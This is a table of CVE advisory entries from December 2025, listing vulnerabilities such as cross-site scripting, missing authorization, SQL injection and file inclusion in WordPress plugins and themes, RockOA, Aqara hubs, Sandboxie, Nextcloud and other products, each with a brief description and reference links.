| DFDevelopment--Ronneby Theme Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DFDevelopment Ronneby Theme Core ronneby-core allows DOM-Based XSS. This issue affects Ronneby Theme Core: from n/a through <= 1.5.68. | 2025-12-09 | not yet calculated | CVE-2025-63037 | https://vdp.patchstack.com/database/Wordpress/Plugin/ronneby-core/vulnerability/wordpress-ronneby-theme-core-plugin-1-5-68-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Themeum--Tutor LMS Elementor Addons | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS Elementor Addons tutor-lms-elementor-addons allows Stored XSS. This issue affects Tutor LMS Elementor Addons: from n/a through <= 3.0.1. | 2025-12-09 | not yet calculated | CVE-2025-63042 | https://vdp.patchstack.com/database/Wordpress/Plugin/tutor-lms-elementor-addons/vulnerability/wordpress-tutor-lms-elementor-addons-plugin-3-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Xpro--Xpro Elementor Addons | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Xpro Xpro Elementor Addons xpro-elementor-addons allows DOM-Based XSS. This issue affects Xpro Elementor Addons: from n/a through <= 1.4.19.1. | 2025-12-09 | not yet calculated | CVE-2025-63044 | https://vdp.patchstack.com/database/Wordpress/Plugin/xpro-elementor-addons/vulnerability/wordpress-xpro-elementor-addons-plugin-1-4-19-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| averta--Master Slider Pro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in averta Master Slider Pro masterslider allows DOM-Based XSS. This issue affects Master Slider Pro: from n/a through <= 3.7.12. | 2025-12-09 | not yet calculated | CVE-2025-63045 | https://vdp.patchstack.com/database/Wordpress/Plugin/masterslider/vulnerability/wordpress-master-slider-pro-plugin-3-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro listingpro-plugin allows DOM-Based XSS. This issue affects ListingPro: from n/a through <= 2.9.9. | 2025-12-09 | not yet calculated | CVE-2025-63046 | https://vdp.patchstack.com/database/Wordpress/Plugin/listingpro-plugin/vulnerability/wordpress-listingpro-plugin-2-9-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CridioStudio--ListingPro | Missing Authorization vulnerability in CridioStudio ListingPro listingpro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ListingPro: from n/a through <= 2.9.9. | 2025-12-09 | not yet calculated | CVE-2025-63047 | https://vdp.patchstack.com/database/Wordpress/Theme/listingpro/vulnerability/wordpress-listingpro-theme-2-9-9-broken-access-control-vulnerability?_s_id=cve |
| CridioStudio--ListingPro Lead Form | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro Lead Form listingpro-lead-form allows DOM-Based XSS. This issue affects ListingPro Lead Form: from n/a through <= 1.0.2. | 2025-12-09 | not yet calculated | CVE-2025-63048 | https://vdp.patchstack.com/database/Wordpress/Plugin/listingpro-lead-form/vulnerability/wordpress-listingpro-lead-form-plugin-1-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CridioStudio--ListingPro Lead Form | Missing Authorization vulnerability in CridioStudio ListingPro Lead Form listingpro-lead-form allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects ListingPro Lead Form: from n/a through <= 1.0.2. | 2025-12-09 | not yet calculated | CVE-2025-63049 | https://vdp.patchstack.com/database/Wordpress/Plugin/listingpro-lead-form/vulnerability/wordpress-listingpro-lead-form-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve |
| sizam--REHub Framework | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in sizam REHub Framework rehub-framework allows Stored XSS. This issue affects REHub Framework: from n/a through <= 19.9.8. | 2025-12-09 | not yet calculated | CVE-2025-63050 | https://vdp.patchstack.com/database/Wordpress/Plugin/rehub-framework/vulnerability/wordpress-rehub-framework-plugin-19-9-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| GalleryCreator--SimpLy Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GalleryCreator SimpLy Gallery simply-gallery-block allows Stored XSS. This issue affects SimpLy Gallery: from n/a through <= 3.2.8. | 2025-12-09 | not yet calculated | CVE-2025-63052 | https://vdp.patchstack.com/database/Wordpress/Plugin/simply-gallery-block/vulnerability/wordpress-simply-gallery-plugin-3-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ExpressTech Systems--Quiz And Survey Master | Missing Authorization vulnerability in ExpressTech Systems Quiz And Survey Master quiz-master-next allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Quiz And Survey Master: from n/a through <= 10.3.1. | 2025-12-09 | not yet calculated | CVE-2025-63054 | https://vdp.patchstack.com/database/Wordpress/Plugin/quiz-master-next/vulnerability/wordpress-quiz-and-survey-master-plugin-10-3-1-broken-access-control-vulnerability?_s_id=cve |
| Liton Arefin--Master Addons for Elementor | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Liton Arefin Master Addons for Elementor master-addons allows Stored XSS. This issue affects Master Addons for Elementor: from n/a through <= 2.0.9.9. | 2025-12-09 | not yet calculated | CVE-2025-63055 | https://vdp.patchstack.com/database/Wordpress/Plugin/master-addons/vulnerability/wordpress-master-addons-for-elementor-plugin-2-0-9-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| bestwebsoft--Contact Form by BestWebSoft | Missing Authorization vulnerability in bestwebsoft Contact Form by BestWebSoft contact-form-plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Contact Form by BestWebSoft: from n/a through <= 4.3.5. | 2025-12-09 | not yet calculated | CVE-2025-63056 | https://vdp.patchstack.com/database/Wordpress/Plugin/contact-form-plugin/vulnerability/wordpress-contact-form-by-bestwebsoft-plugin-4-3-5-broken-access-control-vulnerability?_s_id=cve |
| Roxnor--Wp Ultimate Review | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Roxnor Wp Ultimate Review wp-ultimate-review allows DOM-Based XSS. This issue affects Wp Ultimate Review: from n/a through <= 2.3.6. | 2025-12-09 | not yet calculated | CVE-2025-63057 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-ultimate-review/vulnerability/wordpress-wp-ultimate-review-plugin-2-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Hiroaki Miyashita--Custom Field Template | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Hiroaki Miyashita Custom Field Template custom-field-template allows Retrieve Embedded Sensitive Data. This issue affects Custom Field Template: from n/a through <= 2.7.4. | 2025-12-09 | not yet calculated | CVE-2025-63058 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-field-template/vulnerability/wordpress-custom-field-template-plugin-2-7-4-sensitive-data-exposure-vulnerability?_s_id=cve |
| arscode--Ninja Popups | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in arscode Ninja Popups arscode-ninja-popups allows Stored XSS. This issue affects Ninja Popups: from n/a through <= 4.7.8. | 2025-12-09 | not yet calculated | CVE-2025-63059 | https://vdp.patchstack.com/database/Wordpress/Plugin/arscode-ninja-popups/vulnerability/wordpress-ninja-popups-plugin-4-7-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| hogash--Kallyas | Cross-Site Request Forgery (CSRF) vulnerability in hogash Kallyas kallyas. This issue affects Kallyas: from n/a through <= 4.2. | 2025-12-09 | not yet calculated | CVE-2025-63060 | https://vdp.patchstack.com/database/Wordpress/Theme/kallyas/vulnerability/wordpress-kallyas-theme-4-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| hogash--Kallyas | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in hogash Kallyas kallyas allows DOM-Based XSS. This issue affects Kallyas: from n/a through <= 4.22.0. | 2025-12-09 | not yet calculated | CVE-2025-63061 | https://vdp.patchstack.com/database/Wordpress/Theme/kallyas/vulnerability/wordpress-kallyas-theme-4-22-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AndonDesign--UDesign Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AndonDesign UDesign Core u-design-core allows PHP Local File Inclusion. This issue affects UDesign Core: from n/a through <= 4.14.0. | 2025-12-09 | not yet calculated | CVE-2025-63062 | https://vdp.patchstack.com/database/Wordpress/Plugin/u-design-core/vulnerability/wordpress-udesign-core-plugin-4-14-0-local-file-inclusion-vulnerability?_s_id=cve |
| Yandex Metrika--Yandex.Metrica | Missing Authorization vulnerability in Yandex Metrika Yandex.Metrica wp-yandex-metrika allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Yandex.Metrica: from n/a through <= 1.2.2. | 2025-12-09 | not yet calculated | CVE-2025-63063 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-yandex-metrika/vulnerability/wordpress-yandex-metrica-plugin-1-2-2-broken-access-control-vulnerability?_s_id=cve |
| ashanjay--EventON | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ashanjay EventON eventon allows Stored XSS. This issue affects EventON: from n/a through <= 4.9.12. | 2025-12-09 | not yet calculated | CVE-2025-63064 | https://vdp.patchstack.com/database/Wordpress/Plugin/eventon/vulnerability/wordpress-eventon-plugin-4-9-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
| David Lingren--Media Library Assistant | Authorization Bypass Through User-Controlled Key vulnerability in David Lingren Media Library Assistant media-library-assistant allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Media Library Assistant: from n/a through <= 3.30. | 2025-12-09 | not yet calculated | CVE-2025-63065 | https://vdp.patchstack.com/database/Wordpress/Plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-30-broken-access-control-vulnerability?_s_id=cve |
| p-themes--Porto Theme - Functionality | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in p-themes Porto Theme - Functionality porto-functionality allows Stored XSS. This issue affects Porto Theme - Functionality: from n/a through <= 3.6.2. | 2025-12-09 | not yet calculated | CVE-2025-63066 | https://vdp.patchstack.com/database/Wordpress/Plugin/porto-functionality/vulnerability/wordpress-porto-theme-functionality-plugin-3-6-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| p-themes--Porto Theme - Functionality | Missing Authorization vulnerability in p-themes Porto Theme - Functionality porto-functionality allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Porto Theme - Functionality: from n/a through <= 3.6.2. | 2025-12-09 | not yet calculated | CVE-2025-63067 | https://vdp.patchstack.com/database/Wordpress/Plugin/porto-functionality/vulnerability/wordpress-porto-theme-functionality-plugin-3-6-2-broken-access-control-vulnerability?_s_id=cve |
| sevenspark--Contact Form 7 Dynamic Text Extension | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in sevenspark Contact Form 7 Dynamic Text Extension contact-form-7-dynamic-text-extension allows Code Injection. This issue affects Contact Form 7 Dynamic Text Extension: from n/a through <= 5.0.3. | 2025-12-09 | not yet calculated | CVE-2025-63068 | https://vdp.patchstack.com/database/Wordpress/Plugin/contact-form-7-dynamic-text-extension/vulnerability/wordpress-contact-form-7-dynamic-text-extension-plugin-5-0-3-content-injection-vulnerability?_s_id=cve |
| Vinod Dalvi--Ivory Search | Missing Authorization vulnerability in Vinod Dalvi Ivory Search add-search-to-menu allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ivory Search: from n/a through <= 5.5.12. | 2025-12-09 | not yet calculated | CVE-2025-63069 | https://vdp.patchstack.com/database/Wordpress/Plugin/add-search-to-menu/vulnerability/wordpress-ivory-search-plugin-5-5-12-broken-access-control-vulnerability?_s_id=cve |
| Shahjada--Download Manager | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Shahjada Download Manager download-manager allows Retrieve Embedded Sensitive Data. This issue affects Download Manager: from n/a through <= 3.3.32. | 2025-12-09 | not yet calculated | CVE-2025-63070 | https://vdp.patchstack.com/database/Wordpress/Plugin/download-manager/vulnerability/wordpress-download-manager-plugin-3-3-32-sensitive-data-exposure-vulnerability?_s_id=cve |
| averta--Shortcodes and extra features for Phlox theme | Insertion of Sensitive Information Into Sent Data vulnerability in averta Shortcodes and extra features for Phlox theme auxin-elements allows Retrieve Embedded Sensitive Data. This issue affects Shortcodes and extra features for Phlox theme: from n/a through <= 2.17.12. | 2025-12-09 | not yet calculated | CVE-2025-63071 | https://vdp.patchstack.com/database/Wordpress/Plugin/auxin-elements/vulnerability/wordpress-shortcodes-and-extra-features-for-phlox-theme-plugin-2-17-12-sensitive-data-exposure-vulnerability?_s_id=cve |
| THEMECO--Cornerstone | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in THEMECO Cornerstone cornerstone allows Stored XSS. This issue affects Cornerstone: from n/a through <= 7.7.3. | 2025-12-09 | not yet calculated | CVE-2025-63072 | https://vdp.patchstack.com/database/Wordpress/Plugin/cornerstone/vulnerability/wordpress-cornerstone-plugin-7-7-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dream-Theme--The7 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dream-Theme The7 dt-the7 allows DOM-Based XSS. This issue affects The7: from n/a through <= 12.8.0.2. | 2025-12-09 | not yet calculated | CVE-2025-63073 | https://vdp.patchstack.com/database/Wordpress/Theme/dt-the7/vulnerability/wordpress-the7-theme-12-8-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dream-Theme--The7 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Dream-Theme The7 dt-the7 allows PHP Local File Inclusion. This issue affects The7: from n/a through <= 12.8.0.2. | 2025-12-09 | not yet calculated | CVE-2025-63074 | https://vdp.patchstack.com/database/Wordpress/Theme/dt-the7/vulnerability/wordpress-the7-theme-12-8-0-2-local-file-inclusion-vulnerability?_s_id=cve |
| muffingroup--Betheme | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in muffingroup Betheme betheme allows DOM-Based XSS. This issue affects Betheme: from n/a through <= 28.1.7. | 2025-12-09 | not yet calculated | CVE-2025-63075 | https://vdp.patchstack.com/database/Wordpress/Theme/betheme/vulnerability/wordpress-betheme-theme-28-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Dream-Theme--The7 Elements | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Dream-Theme The7 Elements dt-the7-core allows PHP Local File Inclusion. This issue affects The7 Elements: from n/a through <= 2.7.11. | 2025-12-09 | not yet calculated | CVE-2025-63076 | https://vdp.patchstack.com/database/Wordpress/Plugin/dt-the7-core/vulnerability/wordpress-the7-elements-plugin-2-7-11-local-file-inclusion-vulnerability?_s_id=cve |
| HappyMonster--Happy Addons for Elementor | Missing Authorization vulnerability in HappyMonster Happy Addons for Elementor happy-elementor-addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Happy Addons for Elementor: from n/a through <= 3.20.2. | 2025-12-09 | not yet calculated | CVE-2025-63077 | https://vdp.patchstack.com/database/Wordpress/Plugin/happy-elementor-addons/vulnerability/wordpress-happy-addons-for-elementor-plugin-3-20-2-broken-access-control-vulnerability?_s_id=cve |
| n/a--XiangShan Nanhu V2 and XiangShan Kunmighu V3 | XiangShan Nanhu V2 and XiangShan Kunmighu V3 were discovered to use speculative execution and indirect branch prediction, allowing attackers to access sensitive information via side-channel analysis of the data cache. | 2025-12-10 | not yet calculated | CVE-2025-63094 | https://github.com/necst/aca25-xiangshan-spectre/blob/main/README.md https://github.com/necst/aca25-xiangshan-spectre |
| n/a--HummerRisk thru v1.5.0 | HummerRisk thru v1.5.0 is using a vulnerable Snakeyaml component, allowing attackers with normal user privileges to hit the /rule/add API and thereby achieve RCE and take over the server. | 2025-12-08 | not yet calculated | CVE-2025-63721 | https://github.com/k1ng0fic3/secrisk/blob/main/README.md https://gist.github.com/k1ng0fic3/e8c8c9353fff8fa95e2c2952587e9266 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | Cross-site scripting (XSS) vulnerability in function urltestAction in file cliAction.php in Xinhu Rainrock RockOA 2.7.0 allows remote attackers to inject arbitrary web script or HTML via the m parameter to the task.php endpoint. | 2025-12-09 | not yet calculated | CVE-2025-63737 | https://github.com/rainrocka/xinhu/issues/10 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | An issue was discovered in file index.php in Xinhu Rainrock RockOA 2.7.0 allowing attackers to gain sensitive information via phpinfo via the a parameter to the index.php. | 2025-12-09 | not yet calculated | CVE-2025-63738 | https://github.com/rainrocka/xinhu/issues/11 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | An issue was discovered in function phpinisaveAction in file webmain/system/cogini/coginiAction.php in Xinhu Rainrock RockOA 2.7.0 allowing attackers to authenticated users to modify PHP configuration files via the a parameter to the index.php endpoint. | 2025-12-09 | not yet calculated | CVE-2025-63739 | https://github.com/rainrocka/xinhu/issues/12 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | SQL Injection vulnerability in function getselectdataAjax in file inputAction.php in Xinhu Rainrock RockOA 2.7.0 allowing attackers gain sensitive information, including administrator accounts, password hashes, database structure, and other critical data via the actstr parameter. | 2025-12-09 | not yet calculated | CVE-2025-63740 | https://github.com/rainrocka/xinhu/issues/13 |
| n/a--Xinhu Rainrock RockOA 2.7.0 | SQL Injection vulnerability in function setwxqyAction in file webmain/task/api/loginAction.php in Xinhu Rainrock RockOA 2.7.0 allowing attackers gain sensitive information, including administrator accounts, password hashes, database structure, and other critical data via the shouji and userid parameters. | 2025-12-09 | not yet calculated | CVE-2025-63742 | https://github.com/rainrocka/xinhu/issues/14 |
| n/a--JXL 9 Inch Car Android Double Din Player Android v12.0 | An issue in the Bluetooth firmware of JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted Link Manager Protocol (LMP) packet. | 2025-12-10 | not yet calculated | CVE-2025-63895 | http://jxl.com https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-63895/blob/main/README.md |
| n/a--Nextcloud Server 30.0.0 | Nextcloud Server 30.0.0 is vulnerable to an Insecure Direct Object Reference (IDOR) in the /core/preview endpoint. Any authenticated user can access previews of arbitrary files belonging to other users by manipulating the field parameter. This allows unauthorized disclosure of sensitive data, such as text files or images, without prior sharing permissions. | 2025-12-12 | not yet calculated | CVE-2025-64011 | https://drive.google.com/file/d/1eD3PN-u1caZYgGH96XHmJ7h_OBXEAHW4/view?usp=sharing https://nextcloud.com https://gist.github.com/tarekramm/586dfe2d113fedfee6d71182570fc090 |
| n/a--SourceCodester Patients Waiting Area Queue Management System v1 | SQL injection vulnerability in /php/api_patient_schedule.php in SourceCodester Patients Waiting Area Queue Management System v1 allows attackers to execute arbitrary SQL commands via the appointmentID parameter. | 2025-12-08 | not yet calculated | CVE-2025-64081 | https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html https://packetstorm.news/files/id/211592 |
| n/a--PDF-XChange Editor v10.7.3.401 | A NULL pointer dereference vulnerability in the importDataObject() function of PDF-XChange Editor v10.7.3.401 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-09 | not yet calculated | CVE-2025-64085 | https://www.pdf-xchange.com/ https://jeroscope.com/advisories/2025/jero-2025-012/ |
| n/a--PDF-XChange Editor v10.7.3.401 | A NULL pointer dereference vulnerability in the util.readFileIntoStream component of PDF-XChange Editor v10.7.3.401 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-09 | not yet calculated | CVE-2025-64086 | https://www.pdf-xchange.com/ https://jeroscope.com/advisories/2025/jero-2025-011/ |
| EmbySupport--security | Emby Server is a user-installable home media server. Versions below 4.9.1.81 allow an attacker to gain full administrative access to an Emby Server (for Emby Server administration, not at the OS level). Other than network access, no specific preconditions need to be fulfilled for a server to be vulnerable. This issue is fixed in version 4.9.1.81. | 2025-12-09 | not yet calculated | CVE-2025-64113 | https://github.com/EmbySupport/Emby.Security/security/advisories/GHSA-95fv-5gfj-2r84 |
| Ronald Huereca--Photo Block | Missing Authorization vulnerability in Ronald Huereca Photo Block photo-block allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Photo Block: from n/a through <= 1.5.1. | 2025-12-09 | not yet calculated | CVE-2025-64254 | https://vdp.patchstack.com/database/Wordpress/Plugin/photo-block/vulnerability/wordpress-photo-block-plugin-1-5-1-broken-access-control-vulnerability?_s_id=cve |
| Bowo--Admin and Site Enhancements (ASE) | Missing Authorization vulnerability in Bowo Admin and Site Enhancements (ASE) admin-site-enhancements allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Admin and Site Enhancements (ASE): from n/a through <= 8.0.8. | 2025-12-09 | not yet calculated | CVE-2025-64255 | https://vdp.patchstack.com/database/Wordpress/Plugin/admin-site-enhancements/vulnerability/wordpress-admin-and-site-enhancements-ase-plugin-8-0-8-broken-access-control-vulnerability?_s_id=cve |
| PressTigers--Simple Folio | Cross-Site Request Forgery (CSRF) vulnerability in PressTigers Simple Folio simple-folio allows Cross Site Request Forgery. This issue affects Simple Folio: from n/a through <= 1.1.0. | 2025-12-09 | not yet calculated | CVE-2025-64256 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-folio/vulnerability/wordpress-simple-folio-plugin-1-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Joe Dolson--My Tickets | Missing Authorization vulnerability in Joe Dolson My Tickets my-tickets allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects My Tickets: from n/a through <= 2.1.0. | 2025-12-09 | not yet calculated | CVE-2025-64257 | https://vdp.patchstack.com/database/Wordpress/Plugin/my-tickets/vulnerability/wordpress-my-tickets-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve |
| Brother Industries, Ltd.--Android App "Brother iPrint&Scan" | Android App "Brother iPrint&Scan" versions 6.13.7 and earlier improperly uses an external cache directory. If exploited, application-specific files may be accessed from other malicious applications. | 2025-12-09 | not yet calculated | CVE-2025-64696 | https://support.brother.com/g/s/security/ https://jvn.jp/en/vu/JVNVU99973778/ |
| QualitySoft Corporation--QND Premium/Advance/Standard | QND Premium/Advance/Standard Ver.11.0.9i and prior contains a privilege escalation vulnerability, which may allow a user who can log in to a Windows system with the affected product to gain administrator privileges. As a result, sensitive information may be accessed or altered, and arbitrary actions may be performed. | 2025-12-11 | not yet calculated | CVE-2025-64701 | https://www.qualitysoft.com/product/qnd_vulnerabilities_2025/ https://jvn.jp/jp/JVN40102375/ |
| sandboxie-plus--Sandboxie | Sandboxie is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. In versions 1.16.6 and below, the SYSTEM-level service SbieSvc.exe exposes SbieIniServer::RC4Crypt to sandboxed processes. The handler adds a fixed header size to a caller-controlled value_len without overflow checking. A large value_len (e.g., 0xFFFFFFF0) wraps the allocation size, causing a heap overflow when attacker data is copied into the undersized buffer. This allows sandboxed processes to execute arbitrary code as SYSTEM, fully compromising the host. This issue is fixed in version 1.16.7. | 2025-12-11 | not yet calculated | CVE-2025-64721 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-w476-j57g-96vp https://github.com/sandboxie-plus/Sandboxie/commit/000492f8c411d24292f1b977a107994347bc7dfa https://github.com/sandboxie-plus/Sandboxie/releases/tag/v1.16.7 |
| Japan Total System Co.,Ltd.--GroupSession Free edition | In GroupSession Free edition prior to ver5.7.1, GroupSession byCloud prior to ver5.7.1, and GroupSession ZION prior to ver5.7.1, "External page display restriction" is set to "Do not limit" in the initial configuration. With this configuration, the user may be redirected to an arbitrary website when accessing a specially crafted URL. | 2025-12-12 | not yet calculated | CVE-2025-64781 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Japan Total System Co.,Ltd.--GroupSession Free edition | Reflected cross-site scripting vulnerability exists in GroupSession Free edition prior to ver5.7.1, GroupSession byCloud prior to ver5.7.1, and GroupSession ZION prior to ver5.7.1. If a user accesses a crafted page or URL, an arbitrary script may be executed on the web browser of the user. | 2025-12-12 | not yet calculated | CVE-2025-65120 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| n/a--R.V.R. Elettronica TLK302T | A stored cross-site scripting vulnerability exists in the web management interface of the R.V.R. Elettronica TLK302T telemetry controller (firmware 1.5.1799). | 2025-12-08 | not yet calculated | CVE-2025-65228 | https://www.rvr.it/en/products/components/telemetry-units-system/tlk300-series/tlk302t/ https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65228 |
| n/a--Lyrion Music Server <= 9.0.3. | A stored cross-site scripting (XSS) vulnerability exists in the web interface of Lyrion Music Server <= 9.0.3. An authenticated user with access to Settings Player can save arbitrary HTML/JavaScript in the Player name field. That value is stored by the server and later rendered without proper output encoding on the Information (Player Info) tab, causing the script to execute in the context of any user viewing that page. | 2025-12-08 | not yet calculated | CVE-2025-65229 | https://lyrion.org/ |
| n/a--Barix Instreamer v04.06 and v04.05 | Barix Instreamer v04.06 and v04.05 contains a stored cross-site scripting (XSS) vulnerability in the Web UI Configuration Streaming Destination input. | 2025-12-08 | not yet calculated | CVE-2025-65230 | https://help.barix.com/instreamer/user-manual https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65230 |
| n/a--Barix Instreamer v04.06 and earlier | Barix Instreamer v04.06 and earlier is vulnerable to Cross Site Scripting (XSS) in the Web UI I/O & Serial configuration page, specifically the CTS close command user-input field which is stored and later rendered on the Status page. | 2025-12-08 | not yet calculated | CVE-2025-65231 | https://help.barix.com/instreamer/user-manual https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65231 |
| n/a--Azuriom CMS admin dashboard | Client-side template injection (CSTI) in Azuriom CMS admin dashboard allows a low-privilege user to execute arbitrary template code in the context of an administrator's session. This can occur via plugins or dashboard components that render untrusted user input, potentially enabling privilege escalation to an administrative account. Fixed in Azuriom 1.2.7. | 2025-12-08 | not yet calculated | CVE-2025-65271 | https://github.com/Azuriom/Azuriom https://www.github.com/Azuriom/Azuriom https://github.com/Azuriom/Azuriom/commit/0289175547319add814dcb526e8ba034f1ebc3ec https://www.github.com/Azuriom/Azuriom/commit/0289175547319add814dcb526e8ba034f1ebc3ec https://github.com/1337Skid/CVE-2025-65271 |
| n/a--SNMP Web Pro 1.1 | An unauthenticated directory traversal vulnerability in cgi-bin/upload.cgi in SNMP Web Pro 1.1 allows a remote attacker to read arbitrary files. The CGI concatenates the user-supplied params directly onto the base path (/var/www/files/userScript/) using memcpy + strcat without validation or canonicalization, enabling ../ sequences to escape the intended directory. The download branch also echoes the unsanitized params into Content-Disposition, introducing header-injection risk. | 2025-12-09 | not yet calculated | CVE-2025-65287 | https://damiri.fr/en/cve/CVE-2025-65287 |
| n/a--Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) | A buffer overflow in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) occurs when the device accepts and stores excessively long hostnames from LAN hosts without proper length validation. The affected code performs unchecked copies/concatenations into fixed-size buffers. A crafted long hostname can overflow the buffer, cause a crash (DoS) and potentially enabling remote code execution. | 2025-12-09 | not yet calculated | CVE-2025-65288 | https://damiri.fr/en/cve/CVE-2025-65288 |
| n/a--Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) router | A stored Cross site scripting (XSS) vulnerability in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) router allows a remote attacker on the LAN to inject JavaScript into the router's management UI by submitting a malicious hostname. The injected script is stored and later executed in the context of an administrator's browser (for example after DHCP release/renew triggers the interface to display the stored hostname). Because the management interface uses weak/basic authentication and does not properly protect or isolate session material, the XSS can be used to exfiltrate the admin session and perform administrative actions. | 2025-12-09 | not yet calculated | CVE-2025-65289 | https://damiri.fr/en/cve/CVE-2025-65289 |
| n/a--Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 | Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 fail to validate server certificates during HTTPS firmware downloads, allowing man-in-the-middle attackers to intercept firmware update traffic and potentially serve modified firmware files. | 2025-12-10 | not yet calculated | CVE-2025-65290 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/OTA-Certificate-Validation-Bypass.md |
| n/a--Aqara Hub devices including Hub M2 4.3.6_0027, Hub M3 4.3.6_0025, Camera Hub G3 4.1.9_0027 | Aqara Hub devices including Hub M2 4.3.6_0027, Hub M3 4.3.6_0025, Camera Hub G3 4.1.9_0027 fail to validate server certificates in TLS connections for discovery services and CoAP gateway communications, enabling man-in-the-middle attacks on device control and monitoring. | 2025-12-10 | not yet calculated | CVE-2025-65291 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/CoAP-Certificate-Validation-Bypass.md |
| n/a--Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 | Command injection vulnerability in Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 allows attackers to execute arbitrary commands with root privileges through malicious domain names. | 2025-12-10 | not yet calculated | CVE-2025-65292 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/DNS-Command-Injection.md |
